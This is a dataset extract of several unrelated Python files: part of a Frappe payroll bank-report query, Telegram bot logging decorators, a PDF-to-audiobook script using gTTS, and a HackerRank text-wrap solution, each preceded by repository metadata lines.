join_clauses = compose(lambda x: " AND ".join(x), concatv)
get_components = compose(
list,
partial(pluck, "salary_component"),
lambda x: frappe.get_all(
"Optical Store HR Settings Salary Component",
fields=["salary_component"],
filters={"parentfield": "{}_components".format(x)},
),
lambda x: x.replace(" ", "_").lower(),
)
values = merge(filters, {"components": get_components(filters.get("report_type"))})
return (
join_clauses(["sl.status = %(status)s", "sl.start_date = %(start_date)s"]),
values,
)
def _get_data(clauses, values, keys):
result = frappe.db.sql(
"""
SELECT
e.bank_name AS bank_name,
e.bank_ac_no AS bank_ac_no,
e.employee_name AS employee_name,
sl.name AS salary_slip,
sl.start_date AS start_date,
a.account_number AS account_number
FROM `tabSalary Slip` AS sl
LEFT JOIN `tabEmployee` AS e ON e.name = sl.employee
LEFT JOIN `tabPayroll Entry` AS pe ON pe.name = sl.payroll_entry
LEFT JOIN `tabAccount` AS a ON a.name = pe.payment_account
WHERE {clauses}
""".format(
clauses=clauses
),
values=values,
as_dict=1,
)
get_amounts = compose(
partial(groupby, "salary_slip"),
lambda type: frappe.db.sql(
"""
SELECT
sl.name AS salary_slip,
SUM(sd.amount) AS amount
FROM `tabSalary Detail` AS sd
LEFT JOIN `tabSalary Slip` AS sl ON sl.name = sd.parent
WHERE
sd.parentfield = %(parentfield)s AND
sd.parent IN %(salary_slips)s AND
sd.salary_component IN %(components)s
GROUP BY sl.name
""",
values=merge(
values,
{
"salary_slips": [x.get("salary_slip") for x in result],
"parentfield": type,
},
),
as_dict=1,
)
if result
else {},
)
get_amount = compose(
lambda x: x.get("amount", 0),
excepts(StopIteration, first, lambda _: {}),
lambda col, key: col.get(key, []),
)
earnings = get_amounts("earnings")
deductions = get_amounts("deductions")
def add_remarks(row):
start_date = row.get("start_date")
return merge(
row, {"remarks": "{} SAL".format(start_date.strftime("%b").upper())}
)
def set_amounts(row):
salary_slip = row.get("salary_slip")
amount = get_amount(earnings, salary_slip) - get_amount(deductions, salary_slip)
return merge(row, {"amount": amount})
make_row = compose(partial(pick, keys), add_remarks, set_amounts)
return with_report_generation_time([make_row(x) for x in result], keys)
| 1.789063
| 2
|
bot/decorators.py
|
MrLokans/bank_telegram_bot
| 2
|
12783948
|
<gh_stars>1-10
"""
Useful decorators
"""
import functools
import telegram
from bot.exceptions import BotLoggedError
from bot.settings import logging
logger = logging.getLogger('telegrambot')
def log_exceptions(bot_func):
@functools.wraps(bot_func)
def wrapper(bot, update, *args, **kwargs):
try:
bot_func(bot, update, *args, **kwargs)
except BotLoggedError as e:
chat_id = update.message.chat_id
msg = str(e)
bot.sendMessage(chat_id=chat_id,
text=msg,
parse_mode=telegram.ParseMode.HTML)
return
except Exception as e:
logger.exception("Unknown exception occured.")
return
return wrapper
def log_statistics(bot_func):
@functools.wraps(bot_func)
def wrapper(bot, update, *args, **kwargs):
message = update.message.text
user_id = str(update.message.from_user.id)
chat_id = update.message.chat_id
msg = "{} triggered, user_id: {}, chat_id {}"
logger.info(msg.format(message, user_id, chat_id))
bot_func(bot, update, *args, **kwargs)
return wrapper
| 2.46875
| 2
|
AudioBook GUI code/main.py
|
GuruprasadaShridharHegde/Python-AudioBook
| 1
|
12783949
|
from tkinter import Tk
from tkinter.filedialog import askopenfilename
from gtts import gTTS
import PyPDF2
import os
Tk().withdraw()
filelocation = askopenfilename()
basename = os.path.basename(filelocation)
filename = os.path.splitext(basename)[0]
with open(filelocation, 'rb') as f:
text = PyPDF2.PdfFileReader(f, strict=False)
print(text.numPages)
language = 'en'
output_text = ''
for pagenum in range (0, text.numPages):
pageObj = text.getPage(pagenum)
output_text = output_text + pageObj.extractText()
output = gTTS(text=output_text, lang=language, slow=False)
output.save(filename+".mp3")
f.close()
| 3.09375
| 3
|
__Training__/Python - HackerRank/3. Strings/Text Wrap.py
|
JUD210/Study-Note
| 0
|
12783950
|
# https://www.hackerrank.com/challenges/text-wrap/problem
import textwrap
def wrap(string, max_width):
# return "\n".join(string[i:i+max_width] for i in range(0, len(string), max_width))
return textwrap.fill(string, max_width)
if __name__ == "__main__":
string, max_width = input(), int(input())
# ABCDEFGHIJKLIMNOQRSTUVWXYZ
# 4
result = wrap(string, max_width)
print(result)
# ABCD
# EFGH
# IJKL
# IMNO
# QRST
# UVWX
# YZ
| 3.890625
| 4
|